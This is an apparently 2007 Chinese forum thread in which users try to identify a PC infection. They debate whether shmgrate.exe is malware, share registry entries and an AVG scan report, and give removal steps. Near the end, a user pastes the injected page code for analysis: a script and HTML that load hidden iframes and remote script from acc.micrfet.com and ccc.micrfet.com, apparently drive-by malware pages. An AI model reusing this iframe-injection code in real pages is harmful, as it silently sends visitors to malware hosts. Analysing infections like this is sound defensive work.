请帮我看看这是什么病毒

huxiqiuzhen

为了便于大家分析讨论,补充个确认资料~

Process File: Shmgrate.exe Process Name: Trojan.W32.GASTER
Description: Shmgrate.exe is a process which is registered as a trojan. This Trojan allows attackers to access  your computer from remote locations, stealing passwords, Internet banking and personal data. It is a registered security risk and should be removed immediately.   Recommendation: DISABLE AND REMOVE IMMEDIATELY. This process is most likely a virus or trojan.   Memory Usage : N/A ( Free Up Memory ) System Process: No   Application: No Background Process: Yes Uses Network: Yes Uses Internet: Yes Author: na   Part of: Trojan.W32.GASTER   Security Risk (0-5): 4 ( Secure Now )   Spyware: No ( Free Scan )   Adware No ( Free Scan )   Virus: Yes ( Virus Scan )   Trojan: Yes ( Trojan Scan ) 来源:   http://www.qqread.com/en/windows-process/f671172161.html

[ 本帖最后由 huxiqiuzhen 于 2007-12-9 16:30 编辑 ]

huxiqiuzhen

这个清楚

2007-09-30 23:40自己电脑上扫的SRENG，发现了两项：

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}]
      <Internet Explorer><%systemroot%\system32\shmgrate.exe OCInstallUserConfigIE>    [N/A]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>{881dd1c5-3dcf-431b-b061-f3f88e8be88a}]
      <Outlook Express><%systemroot%\system32\shmgrate.exe OCInstallUserConfigOE>    [N/A]


感觉是有问题的，删之。不放心，网上查了下，大都当做病毒的，比如：

1、http://www.processlib.net/files/shmgrate.exe.html

2、http://www.liutilities.com/produ ... sslibrary/shmgrate/

也有为它喊冤的：http://bbs.54master.com/viewthread.php?tid=178587

后来和尚兄提示说可能是windows自己的文件，是良民，叫我查看比对下路径，米找到有路径的，征对具体情况分析我还是觉得把它删掉更好。嘿嘿。。。so。。。就这样喽哦~



    =============================================================================

~10月6日~

刚刚从崔老师那里（http://hi.baidu.com/teyqiu/blog/ ... efcdc839db4924.html）看到，这两项为良民哦！误杀了~~~~~~

来源  http://hi.baidu.com/%D1%BE_%B6%F ... 98f6ffc3ce798e.html

shiyucn

我用的卡巴，运行sreng2时报错误，我就给卸了，另外还有AVG、木马清道夫、360

huxiqiuzhen

原帖由 shiyucn 于 2007-12-9 16:32 发表
我用的卡巴，运行sreng2时报错误，我就给卸了，另外还有AVG、木马清道夫、360

不应该存在这个问题
我用的也是卡吧,运行sreng没什么反应啊
你应该到官网去下载这个软件,这样才有保证,一样是汉化,免费的.不知道这样说合适不?
毕竟为了运行sreng而卸载卡吧不应该.

shiyucn

我试了这个方法，没效果

shiyucn

1.建议使用XDelBox删除以下文件：(XDelBox1.6下载)
使用说明：删除时复制所有要删除文件的路径，在待删除文件列表里点击右键选择从剪贴板导入，导入后在要删除文件上点击右键，选择立刻重启删除，电脑会重启进入DOS界面进行删除操作。运行xdelbox前最好卸载所有可移动存储介质（包括U盘，MP3，手机存储卡等）。

%systemroot%\system32\shmgrate.exe ocinstalluserconfigoe

==========================================================
不知您所说的是C:\WINDOWS\system32\shmgrate.exe这个文件

shiyucn

我用AVG扫描了一下发现了下面这些
---------------------------------------------------------
AVG Anti-Spyware - 扫描报告
---------------------------------------------------------

+ 创建时间:        19:06:42 2007-12-9

+ 扫描结果:       



C:\Documents and Settings\石宇\Local Settings\Temporary Internet Files\Content.IE5\VFDXQ8X1\xl[1].htm -> Downloader.Psyme.dh : 未进行操作.
C:\Documents and Settings\石宇\Local Settings\Temp\E_4\iext.fnr -> Dropper.Ag.a : 未进行操作.
C:\ftc\Trojanwall.exe -> Heuristic.Win32.Backdoor1 : 未进行操作.
C:\Documents and Settings\石宇\Local Settings\Temp\E_4\krnln.fnr -> Not-A-Virus.HackTool.Win32AldHack.d : 未进行操作.


::报告结束

huxiqiuzhen

原帖由 shiyucn 于 2007-12-9 17:20 发表
1.建议使用XDelBox删除以下文件：(XDelBox1.6下载)
使用说明：删除时复制所有要删除文件的路径，在待删除文件列表里点击右键选择从剪贴板导入，导入后在要删除文件上点击右键，选择立刻重启删除，电脑会重启进入DOS ...

对啊,就是它,目前专家的意见,它是良民
可是也有正规站明确表示它是个木马
因此难以判断.

shiyucn

我在安全模式下用AVG又杀了一遍毒，然后又优化大师清了一下注册表，回到普通模式下，下面所示入口点错误不见了
==================================
API HOOK
入口点错误：FreeLibrary (危险等级: 高,  被下面模块所HOOK: 0x5F00002D)

==================================

但打开有些网页如百度网页时还是加载
http://acc.micrfet.com/.....
http://ccc.micrfet.com/.....
之类的url

有些网站如google都不加载，这是怎么回事？我的网络是局域网，难道局域网有问题？

shiyucn

我把病毒网页里的源码拷贝出来，大家分析分析

vip.js文件如下
===================================================
document.write("<i"+"frame style='display:none;' src=http://acc.micrfet.com/z.htm width=1 height=1 frameborder=0></i"+"frame>");
===================================================
z.htm文件如下
===================================================
<script src=http://ccc.micrfet.com/vip.js></script>                                                                                                                                     <html>
<IFRAME src=http://acc.micrfet.com/14.html width=50 height=1 frameborder=0></IFRAME>
<IFRAME src=http://acc.micrfet.com/real.html width=50 height=1 frameborder=0></IFRAME>
<IFRAME src=http://acc.micrfet.com/xl.html width=50 height=1 frameborder=0></IFRAME>
</html>
<script language="javascript" src="http://count30.51yes.com/click.aspx?id=307116479&logo=1"></script>
============================================================